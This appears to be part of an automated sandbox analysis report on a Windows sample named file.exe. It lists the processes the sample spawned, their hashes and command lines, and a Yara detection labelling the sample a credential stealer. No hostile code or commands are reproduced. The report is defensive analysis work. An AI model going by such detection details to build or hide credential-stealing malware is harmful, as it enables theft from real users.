                                                                                                                                                                        Start time:04:37:17
                                                                                                                                                                        Start date:21/11/2024
                                                                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                        Imagebase:0xa40000
                                                                                                                                                                        File size:1'841'152 bytes
                                                                                                                                                                        MD5 hash:AF5975CD36B5096AC13F087CCD77ED34
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2386311395.000000000176C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:5
                                                                                                                                                                        Start time:04:37:54
                                                                                                                                                                        Start date:21/11/2024
                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                        Imagebase:0x7ff684c40000
                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:7
                                                                                                                                                                        Start time:04:37:55
                                                                                                                                                                        Start date:21/11/2024
                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1880,i,2658369671924741548,14956457475855153189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                        Imagebase:0x7ff684c40000
                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:8
                                                                                                                                                                        Start time:04:37:58
                                                                                                                                                                        Start date:21/11/2024
                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                        Imagebase:0x7ff684c40000
                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:9
                                                                                                                                                                        Start time:04:37:59
                                                                                                                                                                        Start date:21/11/2024
                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,6861188437534111061,5673823380615513189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                        Imagebase:0x7ff684c40000
                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        No disassembly